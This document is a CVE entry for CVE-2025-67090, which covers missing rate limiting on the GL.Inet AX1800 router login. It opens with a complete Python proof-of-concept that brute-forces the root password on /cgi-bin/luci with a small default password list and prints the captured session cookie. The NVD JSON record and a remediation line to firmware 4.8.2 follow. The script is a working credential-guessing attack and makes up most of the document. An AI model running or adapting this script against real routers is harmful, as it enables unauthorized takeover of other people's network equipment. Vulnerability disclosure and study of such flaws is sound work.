CVE-2025-67090

#!/usr/bin/env python3 # CVE-2025-67090 PoC - Gl.Inet AX1800 Bruteforce Attack # This PoC demonstrates the lack of rate limiting on authentication endpoint import requests import sys import time from concurrent.futures import ThreadPoolExecutor, as_completed TARGET_URL = "http://{router_ip}/cgi-bin/luci" # Replace with target IP USERNAME = "root" PASSWORD_FILE = "passwords.txt" MAX_THREADS = 10 DELAY_BETWEEN_REQUESTS = 0.1 def attempt_login(password): """Attempt login with given credentials""" try: data = { "username": USERNAME, "password": password.strip() } response = requests.post(TARGET_URL, data=data, timeout=10) # Check for successful login indicators if response.status_code == 200 and "sysauth" in response.cookies: return True, password.strip(), response # No rate limiting detected - continue attempts return False, password.strip(), response except requests.exceptions.RequestException as e: return False, password.strip(), str(e) def main(): if len(sys.argv) > 1: router_ip = sys.argv[1] else: router_ip = input("Enter router IP: ") target = TARGET_URL.format(router_ip=router_ip) print(f"[*] Target: {target}") print(f"[*] Username: {USERNAME}") print(f"[*] Starting brute force attack (no rate limiting detected)...") try: with open(PASSWORD_FILE, 'r') as f: passwords = f.readlines() except FileNotFoundError: print(f"[!] Password file not found. Using common passwords...") passwords = ['admin', 'password', '123456', 'admin123', 'default', 'glinet'] found = False attempt_count = 0 with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: futures = {executor.submit(attempt_login, pwd): pwd for pwd in passwords} for future in as_completed(futures): success, password, response = future.result() attempt_count += 1 if success: print(f"\n[!] SUCCESS! Valid credentials found:") print(f" Username: {USERNAME}") print(f" Password: {password}") print(f" Auth Cookie: {response.cookies.get('sysauth')}") found = True executor.shutdown(wait=False) break else: if attempt_count % 10 == 0: print(f"[*] Attempts: {attempt_count} - No rate limiting detected...") if not found: print(f"\n[-] Attack completed. {attempt_count} attempts made.") print("[-] No valid credentials found in password list.") if __name__ == "__main__": main() # Remediation: Upgrade to GL.Inet AX1800 firmware version 4.8.2

{"cve": {"id": "CVE-2025-67090", "sourceIdentifier": "[email protected]", "published": "2026-01-08T16:15:45.470", "lastModified": "2026-01-16T21:28:08.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LuCI web interface on Gl Inet GL.Inet AX1800 Version 4.6.4 & 4.6.8 are vulnerable. Fix available in version 4.8.2 GL.Inet AX1800 Version 4.6.4 & 4.6.8 lacks rate limiting or account lockout mechanisms on the authentication endpoint (`/cgi-bin/luci`). An unauthenticated attacker on the local network can perform unlimited password attempts against the admin interface."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:gl-inet:ax1800_firmware:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "053BBC44-BD1D-40FD-91DC-D69A26CDE1AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:gl-inet:ax1800_firmware:4.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8D71DBB4-E154-47AC-9F4C-1C9912CB2880"}, {"vulnerable": true, "criteria": "cpe:2.3:o:gl-inet:ax1800_firmware:4.6.8:*:*:*:*:*:*:*", "matchCriteriaId": "BA1B1DB6-6773-48D0-A936-3B623DB3D558"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:gl-inet:ax1800:-:*:*:*:*:*:*:*", "matchCriteriaId": "BCB312FD-370C-4DF9-961F-F0C4920AA368"}]}]}], "references": [{"url": "https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Press/Media Coverage"]}, {"url": "https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Press/Media Coverage"]}, {"url": "https://www.gl-inet.com/security/", "source": "[email protected]", "tags": ["Broken Link"]}]}}